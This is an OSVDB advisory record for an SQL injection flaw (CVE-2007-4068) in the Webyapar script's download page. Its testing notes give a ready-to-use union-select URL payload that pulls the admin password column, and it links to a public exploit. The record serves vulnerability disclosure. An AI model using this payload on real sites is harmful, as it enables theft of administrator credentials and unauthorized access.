Webyapar download Action kat_id Variable SQL Injection

2007-07-25T00:00:00
ID OSVDB:37131
Type osvdb
Reporter OSVDB
Modified 2007-07-25T00:00:00

Description

Manual Testing Notes

http://[target]/[path]/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin

References:

Related OSVDB ID: 37132 ISS X-Force ID: 35603 Generic Exploit URL: http://www.milw0rm.com/exploits/4224 CVE-2007-4068 Bugtraq ID: 25061